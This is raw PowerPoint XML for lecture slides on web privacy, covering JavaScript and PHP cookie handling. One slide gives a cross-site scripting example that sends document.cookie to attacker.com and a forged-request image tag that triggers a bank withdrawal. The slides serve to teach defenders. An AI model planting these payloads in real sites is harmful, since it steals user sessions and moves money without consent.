          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr lang="en-US" sz="3000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2955A6"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2629775" y="4998325"/>
            <a:ext cx="4220429" cy="278892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl3pPr marL="685800" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl5pPr marL="1371600" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1161609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7/1/2019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7/1/2019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7/1/2019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7/1/2019</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https://en.wikipedia.org/wiki/Alice_and_Bob"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4000" cy="1447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Web and Network Privacy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="7 Rectángulo redondeado"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="2971800"/>
            <a:ext cx="6400800" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:pr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lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Dr. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Hossain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Shahriar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Department of Information Technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Kennesaw State University</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgb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628650" y="365125"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Learning Outcomes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14338" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upon completion of this lesson, students will be able to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand basic Javascript programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand basic PHP programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand how these two programming languages can be used to write cookie-based web application attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16939481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JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>High-level interpreted web programming language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Weak typed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Object-oriented</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multi-paradigm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-side script and database operation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No-web program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typical security concerns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Misplaced trust placed in the client/developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser and plugin coding errors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8058037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JavaScript Program Samples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>&lt;script type="text/javascript"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>function getCookie(cname) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	var name = cname + "=";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	var decodedCookie = decodeURIComponent(document.cookie);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	var ca = decodedCookie.split(';');</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	for(var i = 0; i &lt;ca.length; i++) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>		var c = ca[i];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>		while (c.charAt(0) == ' ') {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>			c = c.substring(1);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>        		}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>        		if (c.indexOf(name) == 0) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>            			return c.substring(name.length, c.length);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>        		}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    	}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    	return "";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31590235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Examples of Malicious Cookie Operation by JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting: cookie theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steal cookies by taking advantage of a website allowing the post of unfiltered HTML and JavaScript content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: after injecting malicious JavaScript code on user’s web (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>www.user.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), once the link is clicked, user cookies will be sent to attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="2" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;a href="#" onclick="window.location = 'http://attacker.com/stole.cgi?text=' + escape(document.cookie); return false;"&gt;Click here!&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit a website where unauthorized commands are transmitted from a user that the web application trusts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Bob is browsing an HTML image crafted by Mallory that references Bob’s bank. If Bob's bank keeps his authentication information in cookie, then loading the image will authorizing a transaction without Bob's approval</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="2" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img src="http://bank.example.com/withdraw?account=bob&amp;amount=1000000&amp; for=mallory"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33494877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PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>High-level interpreted web programming language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Weak typed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Object-oriented</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multi-paradigm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-side script and database operation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Act as a filter: input is a file or stream containing PHP instructions, output is another file or stream (HTML, JSON, XML, etc.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16690801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PHP Program Samples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1610472"/>
            <a:ext cx="7886700" cy="4584140"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	$cookie_name = "user";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	$cookie_value = "John Doe";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	setcookie($cookie_name, $cookie_value, time() + (86400 * 30), "/"); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	if(!isset($_COOKIE[$cookie_name])) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    		echo "Cookie named '" . $cookie_name . "' is not set!";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	} else {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    		echo "Cookie '" . $cookie_name . "' is set!&lt;br&gt;";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    		echo "Value is: " . $_COOKIE[$cookie_name];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;/html&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14137801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30488" y="3616325"/>
            <a:ext cx="4611687" cy="803275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t>WEB AND NETWORK TRAFFIC PRIVACY</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12290" name="Subtitle 2"/>
          <p:cNvSpPr>
